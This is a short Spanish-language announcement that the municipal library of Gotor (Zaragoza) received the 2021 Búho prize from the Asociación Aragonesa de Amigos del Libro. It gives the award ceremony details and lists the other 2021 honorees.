PREMIO BÚHO 2021 A LA BIBLIOTECA MUNICIPAL DE GOTOR

La Biblioteca municipal de Gotor (Zaragoza), localidad celtíbera y sede de los Encuentros de la Celtiberia Literaria y Creativa, ha sido distinguida este año de 2021 con el premio Búho en su XXIX edición. El premio, instituido por la Asociación Aragonesa de Amigos del Libro, reconoce la especial labor de instituciones y personas en el fomento, dedicación y defensa del mundo del libro y, en general, de la lectura. El acto de entrega tendrá lugar el próximo 23 de septiembre, a las 19:00 h, en el «Salón de Aragón» (Patio de la Infanta) de la Fundación Ibercaja. Nuestra enhorabuena a la Biblioteca municipal y al esfuerzo del ayuntamiento gotorino por mantener en pie una pieza fundamental de la formación y el desarrollo del ser humano y por la relevancia que esta labor tiene en el medio rural.

PREMIOS BÚHO 2021

Joaquín Carbonell, in memoriam
Soledad Puértolas
Javier Sierra
José María Conget
Editorial Prensa Diaria Aragonesa
Biblioteca Municipal de Gotor (Zaragoza)